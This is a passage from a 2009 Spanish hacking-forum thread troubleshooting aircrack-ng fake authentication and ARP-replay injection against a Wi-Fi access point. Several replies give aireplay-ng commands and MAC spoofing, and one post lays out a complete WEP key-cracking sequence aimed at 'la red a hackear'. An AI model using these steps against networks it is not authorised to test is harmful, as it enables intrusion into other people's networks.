elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux
| | | |-+  La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)  (Leído 37,723 veces)
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.762


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #10 en: 16 Enero 2009, 19:28 pm »

A1 es el Ataque 1 (Asociación falsa).
En línea





Dominio en venta: https://forojapones.com/
Casidiablo
Desarrollador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.919



Ver Perfil WWW
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #11 en: 16 Enero 2009, 20:08 pm »

¿Y no es eso lo que estoy tratando de hacer? O sea, la opción -1 del comando aireplay-ng...
En línea

heaviloto


Desconectado Desconectado

Mensajes: 783



Ver Perfil
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #12 en: 16 Enero 2009, 20:50 pm »

hola, perdon me e colado, es que con eso de A1 y A3 me lio un poco, xd xd xd xd, queria decir esto exactamente,

- aireplay-ng   -3  -b  (bssid  del AP)  -h   (bessid del  que este conectado)   wlan0 

prueba a poner eso despues de intentar asociarte

un saludo
En línea

larga vida al rock&roll
heaviloto

Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)
Casidiablo
Desarrollador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.919



Ver Perfil WWW
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #13 en: 16 Enero 2009, 21:46 pm »

Muestra esto, y solo esto:

Código:
Read 83454 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...

Van aumentando el número de paquetes pero no los ARP ni ACK...
En línea

Casidiablo
Desarrollador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.919



Ver Perfil WWW
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #14 en: 16 Enero 2009, 21:50 pm »

Si hago todo usando la MAC del AP, me sale esto:

Código:
aireplay-ng -3 -b 00:1C:10:08:39:15 -h 00:1C:10:08:39:15 wlan0
15:47:10  Waiting for beacon frame (BSSID: 00:1C:10:08:39:15) on channel 6
Saving ARP requests in replay_arp-0116-154710.cap
You should also start airodump-ng to capture replies.
Read 18688 packets (got 0 ARP requests and 6 ACKs), sent 0 packets...(0 pps)

Bueno, siempre y cuando en otra consola tenga corriendo el ataque 1... cada vez que en el fake auth aparece esto: Sending Authentication Request (Open System) [ACK], el número de ACKs crece en el ataque 3 (tiene sentido). Pero aún así, no he podido hacer nada.

Muchas gracias por su ayuda.
En línea

heaviloto


Desconectado Desconectado

Mensajes: 783



Ver Perfil
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #15 en: 16 Enero 2009, 22:05 pm »

hola, te suben los datas en el airodump?, si es asi, un poco de paciencia, no siempre es a la preimera, y segun el estado de animo del router, xd xd xd xd xd

un saludo
En línea

larga vida al rock&roll
heaviloto

Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)
fuenteRea


Desconectado Desconectado

Mensajes: 2.709


Volver a ser un niño


Ver Perfil
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #16 en: 17 Enero 2009, 04:11 am »

bajale la rate a la tarjeta ifconfig rate 1M, si tienes un portatil prueba a cambiarte de sitio o apaga y enciende el router porque algunas veces son muy cabezones estos router, un saludo!!
PD: haz el ataque1 de esta manera--> aircrack-ng -1 30 -a BSSID -e ESSID -h BSSID wlan0
« Última modificación: 17 Enero 2009, 04:18 am por thedoctor77 » En línea

Una rosa es una rosa...
Spanslus9mm


Desconectado Desconectado

Mensajes: 588


802.11 // 802.15.4 // 802.16


Ver Perfil
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #17 en: 17 Enero 2009, 11:25 am »

Buenas, te voy a decir como lo veo yo:

- No se seguro si lo estas haciendo, pero es importante cambiarte la MAC de tu tarjeta (pero no a la del AP) y usar esa misma MAC falseada en la opción -h.

-Con el 0 le estas diciendo que se intente reautentificar continuamente. Dependiendo del modelo de router esto no puede ser adecuado, prueba otros valores como 30 o 20 (se reautentifica cada 30 o 20 segundos)

-Bajar el rate a 1M como dice thedoctor77
Código:
iwconfig wlan0 rate 1M

-Puedes probar a añadir la opción -o 1 (Envía solo un tipo de paquetes de cada vez. Por defecto está fijado en múltiples y esto puede confundir a algunos APs)

-Y para terminar hay algunos routers preparados para no responder a este ataque, si pruebas todo lo que te han sugerido y no logras nada quizá no lo puedas hacer.

Saludos ;)

En línea

Una muy breve historia de todo:
El hidrógeno es un gas ligero e inodoro que, con el tiempo suficiente se convierte en gente
Lapiz_tola

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #18 en: 18 Enero 2009, 18:08 pm »

hola yo tengo el programa backtrack 3y mi tarjeta de red es atheros y tengo los pasos a seguir de ese programa y si funciona perfectamente es pero que te sirva de algo PARA CAMBIAR A MODO MONITOR
primera terminal
modprobe -r ath_pci

modprobe ath_pci autocreate=monitor

iwconfig (ath1 es mi trjeta de red) mode monitor

airodump-ng (ath1 es mi tarjeta de red)

iwconfig (ath1 es mi tarjeta de red) rate 1M channel (el de la red a hackear)

ifconfig (ath1 es mi tarjeta de red) hw ether 00:11:22:33:44:55

airodump-ng --ivs --bssid (mac-de la que vas a hackear ) -w (cualquier nombre del archivo) -c (canal de la red) (ath1 es mi tarjeta de red)

segunda terminal


aireplay-ng -1 6 -e (nombre de la red) -a (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red)


tercera terminal

aireplay-ng -3 -b (mac-de la que vas a hackear) -h 00:11:22:33:44:55 (ath1 es mi tarjeta de red)


para sair de las terminales es ctrl:c
para recuperar la clave en la primera terminal le pones

aircrack-ng (nombre del archivo)-01.ivs
los datos que vienen entre parentesis son los que tienes que cambiar ya cambiados no le pongas los( ) espero y te sirva saludos
En línea

fuenteRea


Desconectado Desconectado

Mensajes: 2.709


Volver a ser un niño


Ver Perfil
Re: La inyección funciona, pero no puedo con el "fake authentication" (aircrack-ng)
« Respuesta #19 en: 18 Enero 2009, 18:15 pm »

Lapiz_tola que dices?, ese no es el problema, leete bien el hilo y no varies el problema, un saludo!!
En línea

Una rosa es una rosa...
Páginas: 1 [2] 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines